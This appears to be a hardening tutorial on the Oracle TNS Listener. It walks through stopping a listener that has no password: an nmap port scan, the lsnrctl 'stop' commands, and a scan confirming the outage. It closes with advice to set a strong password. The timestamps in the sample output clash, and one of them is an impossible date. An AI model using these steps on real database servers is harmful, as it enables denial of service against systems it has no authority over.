OracleTNSLSNR
The Oracle TNS Listener is the lynchpin between a
user/web server offering connection and the back-end database. As
such access to it should be restricted. The relevant files that
control the listener are:
$ORACLE_HOME/bin/lsnrctl - This is the actual Listener
control program $ORACLE_HOME/network/admin/listener.ora - The actual TNS
Listener config file $ORACLE_HOME/bin/tnslnsr - The actual listening
process.
This utility carries out the same
functions as WinSid, but there are also a number of other functions this little tool will
perform:
Command: [ping] [version]
[status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file]
[show] [spawn] [stop]
****Notice the stop command (Easy DoS that!!)****
Note: - I have found this tool to work on an adhoc basis, the stability I believe is in question. Obviously all the commands
listed above should work with Oracle 9i and below but Oracle 10g and above, only
the version command will return any interesting data. All other commands
will error due to the security restrictions applied to the listener in 10g.
Obviously if no password has
been assigned to the listener a malicious user can have a field day with your
link to your backend database server i.e.: Before we issue any commands, we confirm the TNS
listener port is open: Step 1 - Ensure the listener is accepting
connections C:\nmap-4.21>nmap -n -p 1521 200.100.100.67
Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2007-02-29 12:24 GMT
Daylight Time
Interesting ports on 200.100.100.67:
PORT STATE SERVICE
1521/tcp open oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)
Nmap finished: 1 IP address (1 host up) scanned in 0.281 seconds
Step 2 - Use the utility above and insert the
command STOP and press connect. alternatively use the on-board Oracle LSNRCTL utility that controls the listener:
LSNRCTL> set current_listener 200.100.100.67
LSNRCTL> stop Step 3 - Confirm the DoS has worked: C:\nmap-4.21>nmap -n -p 1521 200.100.100.67
Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2006-09-29 12:25 GMT
Daylight Time
Interesting ports on 200.100.100.67:
PORT STATE SERVICE
1521/tcp closed oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)
Nmap finished: 1 IP address (1 host up) scanned in 0.282 seconds The moral of the story is: ASSIGN the listener a STRONG password!
|